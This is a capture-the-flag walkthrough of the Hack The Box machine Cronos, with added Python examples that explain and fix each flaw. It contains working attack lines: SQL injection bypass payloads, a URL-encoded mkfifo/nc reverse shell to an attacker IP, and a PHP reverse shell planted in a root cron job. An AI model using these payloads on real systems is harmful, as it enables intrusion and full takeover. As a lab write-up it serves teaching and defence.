This machine was interesting because you had to do a lot of small things to reach the goal. Among them: adding the host to /etc/hosts, and working the DNS server by hand because the usual tools didn't do the job.

We start with an Nmap scan:
root@Kali2:~# nmap -sC -sV 10.10.10.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 21:57 CET
Nmap scan report for 10.10.10.13
Host is up (0.034s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds

Port 53 is open, so we point nslookup at the box itself and ask it about its own address, which gives us the domain name:

root@Kali2:~# nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.
> cronos.htb
Server:         10.10.10.13
Address:        10.10.10.13#53

Name:   cronos.htb
Address: 10.10.10.13
Next we request a zone transfer (AXFR) from the name server with dig axfr @10.10.10.13 cronos.htb, and it hands us the whole zone, including admin.cronos.htb (domained was no use in this case). A name server should only allow AXFR to its own secondaries (BIND's allow-transfer option restricts it); here it answers anyone who asks, which is exactly the kind of misconfiguration that leaks internal hostnames.

; <<>> DiG 9.11.5-P4-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 24 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Oct 29 22:04:30 CET 2019
;; XFR size: 7 records (messages 1, bytes 203)
Once we have the hostnames we add them to the hosts file on Linux (/etc/hosts); it should look something like this:

127.0.0.1 localhost
127.0.1.1 kali
10.10.10.13 cronos.htb admin.cronos.htb

With that the web pages work. Apache is serving name-based virtual hosts, which is why the bare IP only returned the default "It works" page in the Nmap scan: the sites are selected by the Host header, so the browser has to send the right name.
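Turning the zone transfer into hosts entries by hand is fine for one box; the script below does the same from dig's output and is an added example, not something from the original write-up. The AXFR text it parses is the zone shown above, embedded as a constructed sample so it runs offline, and the function names are mine. It generalises slightly past this box: it groups names per address, so a zone with several A records for different hosts yields one hosts line per IP.

```python
"""Turn `dig axfr` output into /etc/hosts entries (added example)."""
import re
from collections import OrderedDict

# Constructed sample: the zone transfer printed by dig earlier on this page.
SAMPLE_AXFR = """\
; <<>> DiG 9.11.5-P4-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 24 msec
"""

# dig prints: name  ttl  class  type  rdata, separated by whitespace/tabs.
# Only A records carry an IPv4 address, so only they become hosts entries.
A_RECORD = re.compile(
    r"^(?P<name>\S+)\s+\d+\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$"
)


def parse_a_records(axfr_text):
    """Return an ordered {ip: [names]} mapping from dig AXFR output.

    Comment lines (';') are skipped, trailing dots are stripped so the
    names are usable in /etc/hosts, and repeated names are collapsed while
    keeping the order in which the server returned them.
    """
    by_ip = OrderedDict()
    for line in axfr_text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = A_RECORD.match(line)
        if not m:
            continue  # SOA, NS, MX, TXT ... carry no address
        name = m.group("name").rstrip(".")
        names = by_ip.setdefault(m.group("ip"), [])
        if name not in names:
            names.append(name)
    return by_ip


def hosts_lines(by_ip):
    """Render one /etc/hosts line per address: '<ip> <name1> <name2> ...'."""
    return ["{} {}".format(ip, " ".join(names)) for ip, names in by_ip.items()]


if __name__ == "__main__":
    # Typical use: dig axfr @10.10.10.13 cronos.htb | python3 this.py >> /etc/hosts
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_AXFR
    for line in hosts_lines(parse_a_records(text)):
        print(line)
```

The output for this zone is a single line listing cronos.htb, admin.cronos.htb, ns1.cronos.htb and www.cronos.htb against 10.10.10.13, which is the hosts entry used above with the two extra names included.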
The admin site has a login form. We can run a very aggressive sqlmap against it (the captured request is saved in the file cronos, hence -r cronos; the '#1*' parameter is the spot marked with * in that file) and see that it is vulnerable to SQL injection. I extracted the password hash (32 hex characters, the shape of an unsalted MD5) but couldn't crack it. What I did instead was log in with the username admin'-- - to comment out the rest of the query and bypass authentication (the trailing dash is there because MySQL needs whitespace after the -- for it to count as a comment).

root@Kali2:~/Desktop# sqlmap --keep-alive --threads=10 --risk=3 --level=5 -r cronos
sqlmap {1.3.3#stable}  http://sqlmap.org

[22:13:24] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 612 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-8951' OR 5579=5579-- gqXx&password=a

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (comment)
    Payload: username=a' RLIKE SLEEP(5)#&password=a
---
Database: admin
Table: users
[1 entry]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
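To see why both the manual admin'-- - bypass and sqlmap's OR 5579=5579 payload work, here is the login logic reproduced offline in SQLite. This is an added example, not the target's PHP (its source is never shown on this page); it assumes the usual query shape WHERE username='<u>' AND password='<hash>' with an unsalted MD5, and reuses the table, column and hash values from the sqlmap dump as constructed sample data. The fixed version binds the inputs as parameters, so the same strings are compared as data instead of being parsed as SQL.

```python
"""SQL injection login bypass, vulnerable vs. parameterised (added example)."""
import hashlib
import sqlite3


def make_db():
    """In-memory copy of the `users` table sqlmap dumped (constructed sample)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', '4f5fffa7b2340178a716e3832451e058')")
    return db


def hash_password(password):
    # Assumption: the app stores unsalted MD5 (the dumped value is 32 hex chars).
    return hashlib.md5(password.encode()).hexdigest()


def vulnerable_query(username, pw_hash):
    """String-built query: attacker input becomes part of the SQL grammar."""
    return "SELECT id FROM users WHERE username='{}' AND password='{}'".format(
        username, pw_hash
    )


def login_vulnerable(db, username, password):
    """Returns True when a row matches; any quote in `username` rewrites the query.

    username = "admin'-- -"  closes the string and comments out the password
    check; "-8951' OR 5579=5579-- gqXx" (sqlmap's payload) makes the WHERE
    clause true for every row.
    """
    row = db.execute(vulnerable_query(username, hash_password(password))).fetchone()
    return row is not None


def login_fixed(db, username, password):
    """Parameterised query: the driver binds values, the SQL text never changes."""
    row = db.execute(
        "SELECT id FROM users WHERE username=? AND password=?",
        (username, hash_password(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for user in ("admin", "admin'-- -", "-8951' OR 5579=5579-- gqXx"):
        print("{:35} vulnerable={} fixed={}".format(
            repr(user), login_vulnerable(db, user, "wrong"), login_fixed(db, user, "wrong")))
```

Run it and the vulnerable login accepts both injected usernames with a wrong password, while the parameterised login rejects all three. A real fix also replaces the unsalted MD5 with a slow, salted password hash, but the injection is the part that let us in here.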
Once inside, the page exposes a network tool (traceroute against a host of our choice) that sends POST requests like this one:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
...
Cookie: PHPSESSID=0lf9ah4h4f2ogilon01ad15va5
Upgrade-Insecure-Requests: 1

command=traceroute&host=8.8.8.8
The command parameter is handed to a shell as-is, so if we change command to

command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1235+>/tmp/f

(URL-decoded: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1235 >/tmp/f) and have nc -nlvp 1235 listening on our side, we get a shell as www-data.
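What the handler behind welcome.php most likely looks like, and how it should look, as an added example; this is not the target's code, which the page never shows, but it assumes the same thing the payload above relies on: the command and host fields are concatenated into a shell string. The hardened version keeps a fixed allowlist of tools with their argv, validates the host as a hostname or IPv4 literal, and runs without a shell, so ;, | and > are just characters that fail validation. The captured POST body is embedded as constructed sample input; run_vulnerable is executed with echo instead of traceroute so the demonstration stays harmless and offline.

```python
"""Command injection in a network-tools form, vulnerable vs. hardened (added example)."""
import re
import subprocess
from urllib.parse import parse_qs

# Constructed sample: the POST body sent on this page, reverse shell URL-encoded.
CAPTURED_BODY = (
    "command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261"
    "|nc+10.10.14.4+1235+>/tmp/f&host=8.8.8.8"
)


def decode_body(body):
    """Decode the form body the way PHP's $_POST would: '+' -> space, %3b -> ';'."""
    params = parse_qs(body)
    return params["command"][0], params["host"][0]


def vulnerable_command_line(command, host):
    """What a shell_exec("$command $host")-style handler ends up running."""
    return "{} {}".format(command, host)


def run_vulnerable(command, host):
    """Executes the concatenated string through /bin/sh (shell=True): injectable."""
    return subprocess.run(
        vulnerable_command_line(command, host), shell=True, capture_output=True, text=True
    ).stdout


# Hardened: known tools only, fixed argv, validated host, and no shell at all.
ALLOWED = {
    "traceroute": ["traceroute", "-m", "5"],
    "ping": ["ping", "-c", "4"],
}
# Hostname labels / dotted IPv4; anything with ';', '|', spaces or quotes fails.
HOST_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_argv(command, host, allowed=ALLOWED):
    """Map (command, host) to an argv list or raise ValueError."""
    if command not in allowed:
        raise ValueError("unknown command: {!r}".format(command))
    if len(host) > 253 or not HOST_RE.match(host):
        raise ValueError("invalid host: {!r}".format(host))
    return allowed[command] + [host]


def run_hardened(command, host, allowed=ALLOWED):
    """argv execution: the host is one argument, never re-parsed by a shell."""
    return subprocess.run(
        build_argv(command, host, allowed), capture_output=True, text=True
    ).stdout


def rejected(command, host, allowed=ALLOWED):
    """True when the hardened path refuses the request."""
    try:
        build_argv(command, host, allowed)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    cmd, host = decode_body(CAPTURED_BODY)
    print("vulnerable handler would run:", vulnerable_command_line(cmd, host))
    print("hardened handler rejects it:", rejected(cmd, host))
    print("harmless injection demo:", run_vulnerable("echo", "8.8.8.8; echo INJECTED").split())
```

The allowlist also covers the case on this page, where the injected text arrived in command rather than host: an unknown command name is refused before any host check runs.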
It is important to export TERM (for example export TERM=xterm) so the shell displays properly, and to start with a clear; I'm not sure why that helps, but it does.

LinEnum shows us the system crontab:

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

The last line is the interesting one: every minute root runs php on /var/www/laravel/artisan. So we check who owns that file:

www-data@cronos:/dev/shm$ ls -la /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 5492 Oct 30 00:27 /var/www/laravel/artisan
artisan is owned by www-data, the user we already are, so we can overwrite it, and since root executes it with php every minute, whatever PHP we put there runs as root. We inject a PHP reverse shell.
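LinEnum printed the crontab, but the step that matters (is anything a root job executes writable by me?) was done by eye. The script below automates that check and is an added example, not code from LinEnum or from the write-up: it parses /etc/crontab-format lines (five time fields, user, command), pulls the absolute paths out of each root command while ignoring redirect targets such as /dev/null, and reports the ones that are regular files the current user can write. The crontab text is the one shown above, embedded as a constructed sample; demo() recreates the Cronos situation in a temporary directory so the result is reproducible without the box.

```python
"""Writable files executed by root cron jobs (added example)."""
import os
import shlex
import tempfile

# Constructed sample: the /etc/crontab LinEnum printed on this page.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

REDIRECTS = {">", ">>", "<", "2>", "2>>", "&>"}


def parse_system_crontab(text):
    """Return [(user, command)] from /etc/crontab-style text (user column present)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)  # m h dom mon dow user command...
        if len(parts) < 7:
            continue
        jobs.append((parts[5], parts[6]))
    return jobs


def absolute_paths(command):
    """Absolute paths a command references, skipping redirect targets."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    paths, prev = [], None
    for tok in tokens:
        if tok.startswith("/") and prev not in REDIRECTS and not tok.startswith((">", "<")):
            paths.append(tok)
        prev = tok
    return paths


def writable_cron_targets(text, user="root"):
    """(path, command) pairs where `user`'s job touches a file we can write."""
    findings = []
    for job_user, command in parse_system_crontab(text):
        if job_user != user:
            continue
        for path in absolute_paths(command):
            if os.path.isfile(path) and os.access(path, os.W_OK):
                findings.append((path, command))
    return findings


def demo():
    """Recreate Cronos: a root job running a file owned by us; returns hit paths."""
    with tempfile.TemporaryDirectory() as tmp:
        artisan = os.path.join(tmp, "artisan")
        with open(artisan, "w") as f:
            f.write("#!/usr/bin/env php\n<?php // placeholder\n")
        crontab = SAMPLE_CRONTAB.replace("/var/www/laravel/artisan", artisan)
        return [path for path, _ in writable_cron_targets(crontab)]


if __name__ == "__main__":
    # On a real host: python3 this.py < /etc/crontab (also worth feeding /etc/cron.d/*)
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    for path, command in writable_cron_targets(text):
        print("WRITABLE: {}  <- {}".format(path, command))
```

On the box itself, feeding it the real /etc/crontab would flag /var/www/laravel/artisan and nothing else: /etc/cron.hourly and friends are directories, and /dev/null is skipped as a redirect target even though it is world-writable.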
We serve php-reverse-shell.php from our machine (with the listener address set to 10.10.14.4:1234), fetch it onto the box and write it over artisan:

www-data@cronos:/dev/shm$ wget 10.10.14.4:801/php-reverse-shell.php
--2019-10-30 00:26:47--  http://10.10.14.4:801/php-reverse-shell.php
Connecting to 10.10.14.4:801... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'php-reverse-shell.php'

php-reverse-shell.p 100%[===================>]   5.36K  --.-KB/s    in 0.1s

2019-10-30 00:26:47 (42.0 KB/s) - 'php-reverse-shell.php' saved [5492/5492]

www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/artisan

From there we have it: start the listener on 1234 and wait for the next minute, when the cron job runs our file as root.

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.13] 39512
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 00:28:01 up 8 min,  0 users,  load average: 0.00, 0.10, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

And with that we add one more machine to our tally 🙂